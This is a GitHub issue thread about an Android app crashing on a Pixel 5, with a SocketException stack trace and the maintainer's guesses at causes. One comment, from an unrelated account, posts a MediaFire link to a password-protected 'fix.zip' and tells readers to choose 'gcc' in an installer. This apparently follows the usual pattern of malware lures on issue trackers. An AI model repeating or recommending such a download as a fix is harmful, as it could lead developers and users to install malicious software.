### ISSUE TITLE
Google Play Console - Pixel 5 crash after five seconds since app launch

### ISSUE THREAD

**Issue by groaking** [gkisalatiga/gki-salatiga-plus#44]
The generated error back-trace:

```
Process: org.gkisalatiga.plus
PID: 21788
UID: 10275
Flags: 0x20e8be44
Package: org.gkisalatiga.plus v24 (0.4.1-beta)
Foreground: Yes
Process-Runtime: 13690
Build: google/redfin/redfin:11/RQ3A.211001.001/7641976:user/release-keys

java.lang.Error: java.net.SocketException: Software caused connection abort
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1173)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:641)
	at java.lang.Thread.run(Thread.java:923)
Caused by: java.net.SocketException: Software caused connection abort
	at java.net.SocketInputStream.socketRead0(Native Method)
	at java.net.SocketInputStream.socketRead(SocketInputStream.java:119)
	at java.net.SocketInputStream.read(SocketInputStream.java:176)
	at java.net.SocketInputStream.read(SocketInputStream.java:144)
	at com.android.org.conscrypt.ConscryptEngineSocket$SSLInputStream.readFromSocket(ConscryptEngineSocket.java:936)
	at com.android.org.conscrypt.ConscryptEngineSocket$SSLInputStream.processDataFromSocket(ConscryptEngineSocket.java:900)
	at com.android.org.conscrypt.ConscryptEngineSocket$SSLInputStream.readUntilDataAvailable(ConscryptEngineSocket.java:815)
	at com.android.org.conscrypt.ConscryptEngineSocket$SSLInputStream.read(ConscryptEngineSocket.java:788)
	at com.android.okhttp.okio.Okio$2.read(Okio.java:138)
	at com.android.okhttp.okio.AsyncTimeout$2.read(AsyncTimeout.java:213)
	at com.android.okhttp.okio.RealBufferedSource.read(RealBufferedSource.java:51)
	at com.android.okhttp.internal.http.Http1xStream$FixedLengthSource.read(Http1xStream.java:395)
	at com.android.okhttp.okio.RealBufferedSource.read(RealBufferedSource.java:51)
	at com.android.okhttp.okio.RealBufferedSource.exhausted(RealBufferedSource.java:61)
	at com.android.okhttp.okio.InflaterSource.refill(InflaterSource.java:103)
	at com.android.okhttp.okio.InflaterSource.read(InflaterSource.java:64)
	at com.android.okhttp.okio.GzipSource.read(GzipSource.java:82)
	at com.android.okhttp.okio.RealBufferedSource$1.read(RealBufferedSource.java:372)
	at java.io.InputStream.read(InputStream.java:101)
	at k7.a.P(SourceFile:5)
	at k7.a.R0(SourceFile:1)
	at q9.c.run(SourceFile:153)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1167)
	... 2 more
```

Possible solutions:
-

- The carousel banners probably caused the issue; replacing offline/zip-downloaded banner images with online-fetched `AsyncImage` banners could probably resolve the issue
- It is probably a random occurence due to server/internet connection error (not because of app bug). Maybe try-catching `java.net.SocketException` could fix

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by groaking** [comment]
Probably solved in #47. Let's see if the error happens again after the update.
